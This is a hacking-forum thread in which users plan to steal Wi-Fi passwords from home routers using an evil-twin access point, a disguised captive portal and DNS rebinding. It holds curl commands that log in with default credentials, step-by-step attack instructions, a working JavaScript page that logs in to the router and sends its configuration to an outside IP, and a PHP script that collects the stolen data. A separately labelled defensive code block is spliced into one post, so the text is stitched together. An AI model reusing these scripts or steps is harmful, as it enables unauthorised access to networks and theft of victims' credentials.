did any one try this dns rebinding attack?

Discussion in 'Forum for discussion of ANTICHAT' started by mooooooon, 16 Apr 2019.

  1. mooooooon

    mooooooon Member

    Joined:
    4 Feb 2019
    Messages:
    167
    Likes Received:
    37
    Reputations:
    1
    How can I perform DNS rebinding using an evil twin at local level?

    As the title says, I want to perform this attack https://sinister.ly/Thread-DNS-Rebinding-Attack using an evil twin at local level.

    The curl command to log in to the router:

    curl "http://192.168.1.1/" --data "frashnum=&action=login&Frm_Logintoken=25&Username=admin&Password=admin"

    The curl command to get the page that contains the Wi-Fi password:

    curl -v -X GET "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_t.gch" -o 565.html

    This is how I was planning to perform the attack:
    evil-twinning a Wi-Fi using fluxion or whatever .... when the user opens the captive portal sign-in network page (that has DNS rebinding scripts in it) is detected, we stop the DDoS ... the user auto-connects to his Wi-Fi, then the page refreshes and executes the DNS rebinding attack to get the Wi-Fi password from his router ....

    But now I don't know how I will get the HTML file back if I want to use it at local level only.

    What do you think, folks?
     
  2. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Interesting attack.
    Actually, with an evil twin you can also exploit the router this way:

    1. Your evil twin network range and gateway should be the same as victim's network
    2. Create a captive portal at the gateway address like http://192.168.0.1/mycaptiveportal/
    2.1. The link should be unique, so there will be no collision with actual router web pages
    2.2. Decorate or disguise it with a loading bar / waiting text / similar infinite animation that will make victim user wait for something
    2.3. In the background it should periodically probe for existing router web pages - since we're located at the gateway address, there will be no cross-domain or cross-origin problems, you can just do it with AJAX
    3. Once the victim has loaded the page, shut down evil twin, so device will connect back to original AP
    4. At this stage the code of captive portal will be able to access real router, it will fetch its main page, and depending on the returned data it will perform further steps (authorization, fetching additional pages or scripts, etc.)
    5. Once the code has found the page with Wi-Fi password, it will generate and perform callback to an evil URL outside of gateway (i.e. some URL from the Internet), this can be done by appending <img> or <script> tag with external source to the DOM tree.

    This method is much easier, and does not require sending any links to the victim. So the prerequisites for successful exploitation are:

    1. Properly configured evil twin with captive portal
    2. External website with a script configured to receive Wi-Fi password (or any other arbitrary data)
    3. Victim user should open captive portal page in browser (because some devices are closing it immediately when disconnecting from evil twin)

    If you've done everything correctly, you will also get victim's external IP address as a bonus. ;)
     
  3. mooooooon

    Thanks.

    I think fluxion already does this, but I will need to change the IP to 192.168.1.255 or something so it doesn't interfere with the router!

    I prefer to just disconnect them from the rogue AP and stop mdk3.

    You mean send the page back to my web server?
    I think sending a request to enable the second SSID would work if we want to do it totally offline.
    BTW, can we make it check if it's connected to the internet, and if yes then execute the code?!

    Can we bypass this by making a big button in the middle of the page titled "open in the browser" ... and when the user clicks on it he gets asked to use the preferred browser to open it!

    There is still one problem: I don't know AJAX :(
    So I need a professional's help :)
     
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Not a good idea, it's a broadcast address.
    There are not many routers supporting multiple VAPs.

    But if the victim's router supports that, it can be done without making external requests.
    Yes, we can; just learn about JavaScript handlers.
     
  5. mooooooon

    And the AJAX programming language, right?

    So no one would shorten the way for me :(
     
  6. mooooooon


    About the part of the code where it exploits the router using AJAX!
    How can I add new commands, or edit it?
    Can someone explain these lines ... the first ones of them!

    Code:
    <?php
        // cache this page for a long time
        header("Cache-Control: max-age=2592000");
        header('Expires: '.gmdate('D, d M Y H:i:s \G\M\T', time() + 365*24*60*60));
    ?>
    <html>
        <head>
        </head>
        <body>
            <h1>This is a sticky page...</h1>
            <script>
                var pattern = /getObj\("Frm_Logintoken"\).value = "(.*)";/g;
                var timer = setInterval(function(){ info(); }, 5000);

                function info()
                {
                    var xhr = new XMLHttpRequest();
                    xhr.open("GET", "http://ligeti.com/", false);
                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                    xhr.send();

                    var result = pattern.exec(xhr.responseText);
                    //alert (xhr.responseText);

                    if (result != null)
                    {
                        if (result.length > 1)
                        {
                            var login = new XMLHttpRequest();
                            var param = "frashnum=&action=login&Frm_Logintoken=" + result[1] + "&Username=admin&Password=admin";
                            //console.log(result[1]);
                            login.open("POST", "http://ligeti.com/", false);
                            login.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                            login.send(param);
                            //console.log(login.responseText);
                            clearInterval(timer);
                            var template = new XMLHttpRequest();
                            template.open("GET", "http://ligeti.com/template.gch", false);
                            template.send();
                            //console.log(template.responseText);
                            alert("Hacked");
                            sendResults(template.responseText);
                        }
                    }
                }

                function sendResults(data)
                {
                    alert("Sending Data");
                    myCallback = function(data){ console.log(data); };
                    var script = document.createElement('script');
                    script.type = 'text/javascript';
                    //myData = data.replace(/&/g, "&amp;").replace(/>/g, "&gt;").replace(/</g, "&lt;").replace(/"/g, "&quot;");
                    console.log(data);
                    script.src = encodeURI('http://92.253.72.62/catch.php?secret=' + data + '&callback=myCallback');
                    document.head.appendChild(script);
                }
                info();
            </script>
        </body>
    </html>
    
    What do I need to change in this code to get the Logintoken from the page?
    In which format should I save the code, PHP or HTML?

    Where do I put this PHP file?

    Code:
    <?php
        $file = '/tmp/secret.html';
        $que = $_GET["secret"];
        file_put_contents($file, $que);
        echo ''.$que;
    ?>
    
    What are the missing steps of setting up the server!? What are they!

    How does this one work? var pattern = /getObj\("Frm_Logintoken"\).value = "(.*)";/g

    I tried to run it in the console of Chrome on the router page, but it did not work!
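    Added defensive example (my own code, not from this thread or from any project named in it): the two checks that break the rebinding flow the script above depends on and that a router or resolver would apply, a resolver-side filter of the kind dnsmasq applies with --stop-dns-rebind, and a Host-header allowlist for the router's own web UI. It assumes the UI answers at 192.168.1.1 as in the curl commands; the hostnames, IPs and scenario values are constructed.

```javascript
// Added defensive example, not code from the thread. Assumes the router UI
// is at 192.168.1.1 (as in the curl commands); names/IPs are constructed.

// Ranges a public hostname should never resolve to (RFC 1918, loopback,
// link-local, "this" network).
const PRIVATE_RANGES = [
  ["10.0.0.0", 8], ["172.16.0.0", 12], ["192.168.0.0", 16],
  ["127.0.0.0", 8], ["169.254.0.0", 16], ["0.0.0.0", 8],
];

function ipToInt(ip) {
  const p = ip.split(".").map(Number);
  if (p.length !== 4 || p.some(n => !Number.isInteger(n) || n < 0 || n > 255)) {
    throw new Error("bad IPv4 address: " + ip);
  }
  return ((p[0] << 24) | (p[1] << 16) | (p[2] << 8) | p[3]) >>> 0;
}

function inRange(ip, [net, bits]) {
  const mask = (0xffffffff << (32 - bits)) >>> 0;
  return (ipToInt(ip) & mask) === (ipToInt(net) & mask);
}

// Resolver-side filter (the idea behind dnsmasq's --stop-dns-rebind): an A
// answer for a public name pointing into private space is the rebind itself.
function isRebindingAnswer(qname, answers) {
  const q = qname.toLowerCase();
  const localName = !q.includes(".") || q.endsWith(".lan") || q.endsWith(".local");
  return !localName && answers.some(ip => PRIVATE_RANGES.some(r => inRange(ip, r)));
}

// Web-UI-side check: after rebinding the browser still sends the attacker's
// name ("ligeti.com") in Host; a real request carries the router's own address.
function hostHeaderAllowed(hostHeader, ownAddrs) {
  const host = hostHeader.trim().toLowerCase().replace(/:\d+$/, "");
  return ownAddrs.includes(host);
}

// Constructed scenario from the thread: ligeti.com first answers publicly, then
// with the router address; the rebound request arrives with Host: ligeti.com.
function evaluateScenario() {
  return {
    firstAnswerDropped: isRebindingAnswer("ligeti.com", ["203.0.113.10"]),
    rebindDropped: isRebindingAnswer("ligeti.com", ["192.168.1.1"]),
    attackHostAccepted: hostHeaderAllowed("ligeti.com", ["192.168.1.1"]),
    realHostAccepted: hostHeaderAllowed("192.168.1.1:80", ["192.168.1.1"]),
  };
}
```

    Neither check covers the evil-twin variant in post 2, where the portal is served from the gateway address itself and every request carries the router's own Host; that path is closed only by the router demanding credentials other than the admin/admin default before serving any page that reveals the Wi-Fi key.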
     
  7. mooooooon

    @binarymaster


    I have tested it and all I am getting is this.

    And when I blocked my IP just like the article, I got this.

    Any ideas??
     
  8. mooooooon

    @binarymaster what do you mean by saying this?
     
  9. binarymaster

    Just learn HTML and JavaScript and you will understand what I said. ;)
     
  10. mooooooon

    @binarymaster


    Why did I get the CORS policy error while on the local side?

    What do you suggest?
    Should I spoof the router IP?
     
  11. mooooooon

    @binarymaster after I wrote all the needed code (from the server code to the attack code to routers that don't store the Wi-Fi password in pages but in the config file), that step of opening the browser instead of the WebView failed no matter what I tried. There was no fix, all the solutions on the web didn't ... Now I have to abandon the idea because of this limitation :( !

    I would really like your comment on this.
    Regards